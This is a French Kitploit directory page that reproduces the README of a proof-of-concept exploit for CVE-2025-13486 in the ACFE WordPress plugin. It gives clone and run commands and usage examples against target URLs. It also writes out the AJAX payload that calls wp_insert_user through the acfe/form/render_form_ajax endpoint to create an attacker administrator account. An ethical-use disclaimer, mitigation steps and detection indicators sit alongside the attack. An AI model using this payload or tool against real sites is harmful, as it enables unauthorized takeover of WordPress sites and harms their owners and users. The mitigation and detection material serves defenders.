Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Création d'Admin | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Création d'Admin

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔴 CVE-2025-13486 - Exploitation du plugin WordPress Advanced Custom Fields Extended (ACFE)

WordPress Python License Status

WordPress Logo

📋 Aperçu

Preuve de concept de l'exploit pour CVE-2025-13486, une vulnérabilité critique dans le plugin WordPress Advanced Custom Fields: Extended (ACFE) qui permet une exécution de code à distance conduisant à une élévation de privilèges.

🎯 Détails de la vulnérabilité

AspectDétails
CVE IDCVE-2025-13486
PluginAdvanced Custom Fields: Extended (ACFE)
TypeExécution de code à distance → Élévation de privilèges
Niveau de risqueCritique
Versions affectéesVersions vulnérables d'ACFE (versions spécifiques à déterminer)
Score CVSS9.8 CRITIQUE
Date de découverte2025
Auteur0xgh057r3c0n

⚠️ AVERTISSEMENT D'UTILISATION ÉTHIQUE

⚠️ AVERTISSEMENT : Cet outil est destiné UNIQUEMENT aux tests de sécurité autorisés et à des fins éducatives.

✅ Utilisation autorisée :

  • Recherche et éducation en sécurité
  • Test de vos propres systèmes
  • Tests de pénétration autorisés avec permission écrite
  • Recherche et enseignement académiques
  • Formation à la sensibilisation à la sécurité

❌ Utilisation interdite :

  • Tests non autorisés de systèmes que vous ne possédez pas
  • Attaques malveillantes ou piratage
  • Toute activité illégale
  • Violation des lois sur la fraude informatique (CFAA, etc.)
  • Tests de sécurité contraires à l'éthique

L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Obtenez toujours une autorisation écrite appropriée avant de tester un système.

🔧 Fonctionnalités

🔍 Mode Vérification

  • Extraction du nonce depuis les pages WordPress
  • Confirmation de la vulnérabilité à l'aide de la fonction print_r
  • Vérification sécurisée sans exploitation
  • Correspondance de plusieurs motifs pour la détection du nonce

⚡ Mode Exploitation

  • Création d'un utilisateur administratif via wp_insert_user
  • Identifiants personnalisés ou générés aléatoirement
  • Prise en charge des noms d'utilisateur, mots de passe et e-mails personnalisés
  • Analyse de la réponse pour les indicateurs de succès

🛠️ Fonctionnalités techniques

  • Détection automatique du protocole (HTTP/HTTPS)
  • Sortie terminale colorée
  • Contournement de la vérification SSL pour les environnements de test
  • Rapports d'erreur détaillés et débogage
  • Gestion des délais d'attente de session et des connexions

📦 Installation

Prérequis

  • Python 3.6+
  • Bibliothèque requests

Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Installer les dépendances
pip install requests

# Alternative : installer depuis requirements.txt
pip install -r requirements.txt

# Rendre le script exécutable (Linux/Mac)
chmod +x exploit.py

Dépendances

Créez un fichier requirements.txt :

root@kitploit:~
requests>=2.25.1

🚀 Utilisation

Syntaxe de base

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

Exemples

1. Vérifier la vulnérabilité uniquement (test sécurisé)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. Exploit avec des identifiants aléatoires

root@kitploit:~
python3 exploit.py --url https://target.com

3. Exploit avec des identifiants personnalisés

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Cible sans protocole (détection automatique)

root@kitploit:~
python3 exploit.py --url target.com --verify

Options de la ligne de commande

🧪 Comment ça fonctionne

1. Mécanisme de la vulnérabilité

L'exploit tire parti d'une gestion incorrecte des fonctions dans le point de terminaison acfe/form/render_form_ajax du plugin ACFE, permettant aux attaquants d'appeler des fonctions PHP arbitraires.

2. Flux technique

root@kitploit:~
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators

3. Charge utile de l'exploit

root@kitploit:~
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Atténuation

Actions immédiates

  1. Mettez à jour le plugin : Mettez immédiatement à jour le plugin ACFE vers la dernière version
  2. Supprimez le plugin : Si la mise à jour n'est pas disponible, désactivez temporairement ACFE
  3. Pare-feu d'application Web : Déployez des règles WAF pour bloquer les requêtes malveillantes
  4. Surveillance : Surveillez la création suspecte d'utilisateurs administrateurs

Renforcement de la sécurité WordPress

root@kitploit:~
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Détection

Indicateurs de compromission (IoC)

  • Création non autorisée d'un utilisateur administrateur
  • Requêtes AJAX suspectes vers /wp-admin/admin-ajax.php
  • Requêtes avec action=acfe/form/render_form_ajax
  • Appels inattendus à la fonction wp_insert_user via AJAX

Surveillance des journaux

root@kitploit:~
# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Références

  1. Dépôt de plugins WordPress : Advanced Custom Fields: Extended
  2. Base de données CVE : CVE-2025-13486
  3. Équipe de sécurité WordPress : Directives de sécurité pour les plugins
  4. OWASP Top 10 : Attaques par injection

🤝 Contribution

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité (git checkout -b feature/improvement)
  3. Commiter les modifications (git commit -am 'Add new feature')
  4. Pousser vers la branche (git push origin feature/improvement)
  5. Créer une Pull Request

Directives pour les contributeurs

  • Suivez le guide de style Python PEP 8
  • Ajoutez des commentaires pour la logique complexe
  • Incluez la gestion des erreurs
  • Mettez à jour la documentation

🐛 Signalement de problèmes

Veuillez signaler les bogues et problèmes via :

  1. GitHub Issues : Créer une nouvelle issue
  2. Vulnérabilités de sécurité : Divulgation responsable d'abord à l'auteur

📊 Structure du projet

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # Script d'exploit principal
├── README.md           # Cette documentation
├── requirements.txt    # Dépendances Python
├── LICENSE            # Fichier de licence MIT
├── examples/          # Exemples d'utilisation
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # Scripts de test
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 Auteur

0xgh057r3c0n - Chercheur en sécurité

  • GitHub : @0xgh057r3c0n
  • Twitter : @0xgh057r3c0n

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Construit avec ❤️ pour la communauté de la sécurité
⚠️ Utilisez de manière responsable et éthique ⚠️

Télécharger l’outil
OptionDescriptionRequisPar défaut
-u, --urlURL WordPress cibleOui-
--verifyVérifier uniquement, sans exploitationNonFaux
--userNom d'utilisateur personnalisé pour l'adminNonadmin_XXXXX
--passwordMot de passe personnalisé pour l'adminNon12 caractères aléatoires
--emailEmail personnalisé pour l'adminNon[email protected]